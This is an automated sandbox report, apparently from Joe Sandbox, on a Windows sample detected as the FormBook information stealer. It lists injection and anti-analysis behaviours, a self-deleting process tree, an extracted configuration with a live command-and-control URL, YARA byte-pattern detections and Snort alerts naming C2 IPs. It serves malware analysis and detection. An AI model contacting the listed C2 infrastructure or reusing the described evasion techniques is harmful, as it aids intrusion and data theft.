Edit tour

Windows Analysis Report
881SP1exr1.exe

Overview

General Information

Sample Name:	881SP1exr1.exe
Original Sample Name:	fc8b3a3005cdc80ce19af33a57010fa8.exe
Analysis ID:	1332500
MD5:	fc8b3a3005cdc80ce19af33a57010fa8
SHA1:	b3303ebe7263a55a61e80407706711ca0727e496
SHA256:	66e461f8245be149d5a3826d29c170d5960ade477be127c0fe2bc315e26067a3
Tags:	32exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Modifies the prolog of user mode functions (user mode inline hooks)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

.NET source code contains very large array initializations

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

881SP1exr1.exe (PID: 7264 cmdline: C:\Users\user\Desktop\881SP1exr1.exe MD5: FC8B3A3005CDC80CE19AF33A57010FA8)

881SP1exr1.exe (PID: 7420 cmdline: C:\Users\user\Desktop\881SP1exr1.exe MD5: FC8B3A3005CDC80CE19AF33A57010FA8)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

chkdsk.exe (PID: 7464 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)

cmd.exe (PID: 7548 cmdline: /c del "C:\Users\user\Desktop\881SP1exr1.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.iqixuehe.com/4hc5/"], "decoy": ["amandaastburyillustration.com", "7141999.com", "showshoe.info", "sagemarlin.com", "lithuaniandreamtime.com", "therenixgroupllc.com", "avalialooks.shop", "vurporn.com", "lemmy.systems", "2816goldfinch.com", "pacersun.com", "checktrace.com", "loadtransfer.site", "matsuri-jujutsukaisen.com", "iontrapper.science", "5108010.com", "beidixi.com", "21305599.com", "peakvitality.fitness", "osisfeelingfee.com", "hotshark-shop.com", "bollywood.nexus", "stephenplattassociatesllp.com", "bakepreneurs.com", "claudiobarros.online", "akabou-hayasaka.com", "collibrishop.online", "britishfemalevo.com", "prestigesmp.online", "wzmatics.com", "sactribune.com", "slotjitu88.website", "theproactiveexpat.com", "therealnikib.com", "elnoh.life", "tianyan110.com", "tcbbuilds.com", "zhe276.com", "c1405.com", "candicrem.com", "lambdasigmarho.com", "gemwhk.store", "crissmendez.com", "locduongseafood.com", "jessformdsenate.info", "329.bio", "nbgonghe.com", "tr-ij.com", "quailrun-inc.com", "pathlightpropertiesmgt.com", "lpqxmz.site", "castlegrouplt.com", "beautybylily.com", "bernabeicarniceriaygranja.com", "spicax.com", "globalentertainmentservices.com", "modluxenwa.com", "imaswe.com", "hntv6201.top", "homerevamps.today", "motionmixmedia.com", "antojitoslosramos.com", "julieslive.com", "bepnuclasechia.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x796a9:$a1: 3C 30 50 4F 53 54 74 09 40 0xa7ac9:$a1: 3C 30 50 4F 53 54 74 09 40 0xd4ee9:$a1: 3C 30 50 4F 53 54 74 09 40 0x8ffd8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xbe3f8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xeb818:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7de17:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xac237:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xd9657:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x88cff:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xb711f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xe453f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7cd60:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7cfca:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xab180:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xab3ea:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd85a0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd880a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x88afd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xb6f1d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xe433d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x885e9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb6a09:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xe3e29:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x88bff:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xb701f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xe443f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x88d77:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb7197:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xe45b7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x7d9e2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xabe02:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xd9222:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x8bc61:$sqlite3step: 68 34 1C 7B E1 0x8bd74:$sqlite3step: 68 34 1C 7B E1 0xba081:$sqlite3step: 68 34 1C 7B E1 0xba194:$sqlite3step: 68 34 1C 7B E1 0xe74a1:$sqlite3step: 68 34 1C 7B E1 0xe75b4:$sqlite3step: 68 34 1C 7B E1 0x8bc90:$sqlite3text: 68 38 2A 90 C5 0x8bdb5:$sqlite3text: 68 38 2A 90 C5 0xba0b0:$sqlite3text: 68 38 2A 90 C5 0xba1d5:$sqlite3text: 68 38 2A 90 C5 0xe74d0:$sqlite3text: 68 38 2A 90 C5 0xe75f5:$sqlite3text: 68 38 2A 90 C5 0x8bca3:$sqlite3blob: 68 53 D8 7F 8C 0x8bdcb:$sqlite3blob: 68 53 D8 7F 8C 0xba0c3:$sqlite3blob: 68 53 D8 7F 8C 0xba1eb:$sqlite3blob: 68 53 D8 7F 8C 0xe74e3:$sqlite3blob: 68 53 D8 7F 8C 0xe760b:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: 881SP1exr1.exe PID: 7264	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 881SP1exr1.exe PID: 7264	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9eb7d:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: 881SP1exr1.exe PID: 7420	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6c329:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: chkdsk.exe PID: 7464	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xa9e4b:$a1: 3C 30 50 4F 53 54 74 09 40 0xe4403:$a1: 3C 30 50 4F 53 54 74 09 40 0x11a325:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.881SP1exr1.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.881SP1exr1.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.881SP1exr1.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.881SP1exr1.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.881SP1exr1.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
2.2.881SP1exr1.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.881SP1exr1.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.881SP1exr1.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.881SP1exr1.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.881SP1exr1.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 154.205.127.201

Timestamp:	192.168.2.4154.205.127.20149751802031412 10/26/23-09:49:19.774091
SID:	2031412
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 34.68.234.4

Timestamp:	192.168.2.434.68.234.449753802031412 10/26/23-09:50:00.519357
SID:	2031412
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 154.86.64.96

Timestamp:	192.168.2.4154.86.64.9649754802031412 10/26/23-09:50:21.217300
SID:	2031412
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 3.64.163.50

Timestamp:	192.168.2.43.64.163.5049747802031412 10/26/23-09:47:37.390469
SID:	2031412
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 199.34.228.191

Timestamp:	192.168.2.4199.34.228.19149752802031412 10/26/23-09:49:39.892248
SID:	2031412
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 167.172.228.26

Timestamp:	192.168.2.4167.172.228.2649755802031412 10/26/23-09:50:41.435579
SID:	2031412
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	192.168.2.491.195.240.1949743802031412 10/26/23-09:47:16.596276
SID:	2031412
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 45.64.97.60

Timestamp:	192.168.2.445.64.97.6049750802031412 10/26/23-09:48:59.501363
SID:	2031412
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 13.32.208.72

Timestamp:	192.168.2.413.32.208.7249749802031412 10/26/23-09:48:38.253900
SID:	2031412
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 103.120.80.111

Timestamp:	192.168.2.4103.120.80.11149748802031412 10/26/23-09:47:58.535070
SID:	2031412
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.iqixuehe.com/4hc5/"], "decoy": ["amandaastburyillustration.com", "7141999.com", "showshoe.info", "sagemarlin.com", "lithuaniandreamtime.com", "therenixgroupllc.com", "avalialooks.shop", "vurporn.com", "lemmy.systems", "2816goldfinch.com", "pacersun.com", "checktrace.com", "loadtransfer.site", "matsuri-jujutsukaisen.com", "iontrapper.science", "5108010.com", "beidixi.com", "21305599.com", "peakvitality.fitness", "osisfeelingfee.com", "hotshark-shop.com", "bollywood.nexus", "stephenplattassociatesllp.com", "bakepreneurs.com", "claudiobarros.online", "akabou-hayasaka.com", "collibrishop.online", "britishfemalevo.com", "prestigesmp.online", "wzmatics.com", "sactribune.com", "slotjitu88.website", "theproactiveexpat.com", "therealnikib.com", "elnoh.life", "tianyan110.com", "tcbbuilds.com", "zhe276.com", "c1405.com", "candicrem.com", "lambdasigmarho.com", "gemwhk.store", "crissmendez.com", "locduongseafood.com", "jessformdsenate.info", "329.bio", "nbgonghe.com", "tr-ij.com", "quailrun-inc.com", "pathlightpropertiesmgt.com", "lpqxmz.site", "castlegrouplt.com", "beautybylily.com", "bernabeicarniceriaygranja.com", "spicax.com", "globalentertainmentservices.com", "modluxenwa.com", "imaswe.com", "hntv6201.top", "homerevamps.today", "motionmixmedia.com", "antojitoslosramos.com", "julieslive.com", "bepnuclasechia.com"]}

Multi AV Scanner detection for submitted file

Source: 881SP1exr1.exe	ReversingLabs: Detection: 22%
Source: 881SP1exr1.exe	Virustotal: Detection: 34%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

